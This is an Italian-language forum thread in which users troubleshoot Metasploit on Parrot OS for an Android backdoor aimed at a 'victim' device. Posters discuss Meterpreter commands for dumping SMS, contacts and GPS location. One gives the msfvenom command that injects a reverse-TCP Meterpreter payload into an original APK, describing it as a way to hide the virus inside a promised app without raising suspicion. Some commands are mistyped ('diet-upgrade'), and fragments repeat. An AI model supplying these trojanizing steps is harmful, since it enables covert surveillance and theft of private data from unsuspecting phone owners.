ehmmm… ma hai capito almeno la domanda?ma.. secondo te.. parrot va aggiornato? e semplice installare una OS.. ma..
Follow along with the video below to see how to install our site as a web app on your home screen.
Nota: This feature may not be available in some browsers.
ehmmm… ma hai capito almeno la domanda?ma.. secondo te.. parrot va aggiornato? e semplice installare una OS.. ma..
ah ok perfetto, ma poi se disinstallo l'applicazione "esca" dal dispositivo vittima, viene automaticamente eliminato anche l'api payload o no?
apt-get update
apt-get install diet-upgrade
// e per sicurezza
msfupdate
ma nulla non va la shell, poi con sta nuova versione ogni volta devi ricordarti di scrivere load android o load windows…. mah
Salve forum,
dopo un po' di tempo ho riscaricato la nuova versione di parrot security os… Quindi ho creato una backdoor per android e poi ho messo in ascolto il listener di metasploit….
Una volta avvenuta la connessione ho notato subito delle differenze… Innanzi tutto l'app main activity scompare proprio dal dispositivo ( e questa è una cosa molto positiva mentre prima non lo faceva), ma aprendo il menu dei comandi con help, ho notato subito che mancano molti comandi con la nuova versione di metasploit quali ad esempio dump_sms (per prelevare gli sms), oppure inviare sms, oppure ancora non c'è più check_root , dump contacts o ancora la localizzazione con il gps… ma nemmeno escono i nuovi comandi nel menu help di meterpreter nel caso fossero cambiati con le nuove versioni!..
Quello che voglio dire sono stati rimossi completamente questi comandi oppure è cambiato il loro nome dopo l'aggiornamento di metasploit e tutto il sistema ma non appaiono nel menu help???
Grazie.
3.1
ciao io ho un problema simile al tuo.. i comandi non sono scomparsi o tolti ma praticamente non gli ha caricati perciò devi scrivere quando sei in mterpreter
load android
e ti carica tutto ma effettivamente avrai problemi anche nell'entrare in shell dicendo che ha un tipo di errore.. sarebbe tutto questo un bug di metasploit poiché presumo tu abbia la versione 4.12.21 o 4.12.24 ma anche se lo aggiorni alla 4.12.27 o anche alla 4.12.28 questo problema non lo avrai più bensi avrai problemi con la creazione della backdoor poiché non riesce a trovare la classe dentro a com.metasploit.stage
keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -dname "CN=Android Debug,O=Android,C=US"
Generazione in corso di una coppia di chiavi DSA da 1.024 bit e di un certificato autofirmato (SHA1withDSA) con una validità di 90 giorni
per: CN=Android Debug, O=Android, C=US
[Memorizzazione di /root/.android/debug.keystore] in corso
Errore keytool: java.io.FileNotFoundException: /root/.android/debug.keystore (File o directory non esistente)
java.io.FileNotFoundException: /root/.android/debug.keystore (File o directory non esistente)
at java.io.FileOutputStream.open0(Native Method)
at java.io.FileOutputStream.open(FileOutputStream.java:270)
at java.io.FileOutputStream.<init>(FileOutputStream.java:213)
at java.io.FileOutputStream.<init>(FileOutputStream.java:101)
at sun.security.tools.keytool.Main.doCommands(Main.java:1144)
at sun.security.tools.keytool.Main.run(Main.java:343)
at sun.security.tools.keytool.Main.main(Main.java:336)
no nel senso che se ad esempio prendessi l'api riguardante un'altra applicazione e la vorrei blindare con l'apk backdoor che sarebbe il virus, in modo tale da far installare sia l'applicazione promessa che in contemporanea il virus , mediante lo stesso apk, per non destare sospetti.in che senso? c'è intendi se puoi usare jarsigner per qualsiasi applicazione?
esiste un comando da msfvenom che ti permette di inserire i dati del payload dentro un applicazione originale casuale (tranne gli av, facebook o comunque apk più "famosi" vanno fatti a mano usando apktool)
msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=porta -x /percorso-del-file/file.apk -o /altro-percorso/file.apk
i file.apk al posto del file metti l'esatto nome dato dall'apk cosi non se ne accorgerà di niente
se il comando shell non va devi aggiornale metasploit alla 4.12.27
apt-get update
apt-get install diet-upgrade
// e per sicurezza
msfupdate
Grazie, problema risolto, sei stato utilissimobeh si se disinstalla l'apk con backdoor si cancella tutto poiché comunque i file sono sempre e comunque dentro all'apk
Codice:apt-get update apt-get install diet-upgrade // e per sicurezza msfupdate
Non basta se sei in parrot devi andare in parrot upgrade manager e scaricarti i repository testing e installare il tutto o se no https://github.com/rapid7/metasploit-framework/releases dentro a questo sito ti scarichi la versione più recente e fai bundle install e stai anche sicuro che avrai problemi poiché non riuscirà ad installar